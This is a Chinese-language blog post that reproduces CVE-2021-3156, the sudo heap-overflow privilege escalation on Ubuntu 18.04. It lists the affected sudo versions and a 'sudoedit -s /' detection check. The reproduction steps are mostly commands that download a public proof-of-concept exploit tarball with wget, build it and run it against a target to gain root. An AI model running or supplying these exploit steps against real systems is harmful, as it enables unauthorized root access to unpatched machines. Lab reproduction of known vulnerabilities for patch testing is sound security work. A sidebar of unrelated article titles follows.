CVE-2021-3156 复现
2024-08-30 16:21:08
测试环境
- OS:
Ubuntu 18.04.5 LTS
- GCC:
gcc version 7.5.0 (Ubuntu 7.5.0-3ubuntu1~18.04)
- Make:
GNU Make 4.1
- EXP:
https://haxx.in/CVE-2021-3156_nss_poc_ubuntu.tar.gz
- Sudo :
Sudoers I/O plugin version 1.8.21p2
影响版本
Sudo Version 1.8.2 - 1.8.31p2
Sudo Version 1.9.0 - 1.9.5p1
不影响版本
Sudo Version => 1.9.5p2
漏洞检测
sudoedit -s /
受影响的开头是
sudoedit
, 不受影响的是usage
漏洞复现
wget https://haxx.in/CVE-2021-3156_nss_poc_ubuntu.tar.gz
tar -zxvf CVE-2021-3156_nss_poc_ubuntu.tar.gz
cd CVE-2021-3156/
make
./sudo-hax-me-a-sandwich target
当然 也可以一步步的来 我是用
;
拼接了的
target有0,1,具体单独运行看下就可以 退出
ctrl+d
orexit
都可以的
最新文章
- mysql函数大全
- 分享Kali Linux 2016.2第50周镜像文件
- WEB启动时就加载servlet的dopost方法
- eclipse 安装activity插件
- 使用.Net自带的GZipStream进行流压缩与解压
- cron
- iOS设计模式之组合模式
- Java 动态眨眼 EyesJPanel (整理)
- javaweb学习总结二十二(servlet开发中常见的问题汇总)
- linux VM命令下查找
- Amdroid示例:利用Gson生成或解析json
- UltraISO制作U盘系统安装盘(图文教程)
- (cljs/run-at (->;JSVM :browser) ";语言基础";)
- JAVA高并发
- jBPM学习之利用API完成流程实例
- CSS3让长单词与URL地址自动换行——word-wrap属性
- chrono--高精度计时
- ThinkPHP5配置redis缓存
- VMware虚拟机CentOS7网络通信与无线上网
- MII与RMII接口的区别【转】
热门文章
- 温故知新,.Net Core利用UserAgent+rDNS双解析方案,正确识别并反爬虫/反垃圾邮件
- 测试开发:推荐一款阿里最新 Python 自动化开源工具!
- POJ 3304 Segments 叉积
- 初识Sonarqube
- 打通“任督二脉”:Android 应用安装优化实战
- Java实验项目三——递归实现字符串查找和替换操作
- C++11运算符重载详解与向量类重载实例(<<,>>,+,-,*等)
- [刘阳Java]_BeanNameViewResolver视图解析器_第8讲
- ES6 箭头函数及this
- Linux基础服务搭建综合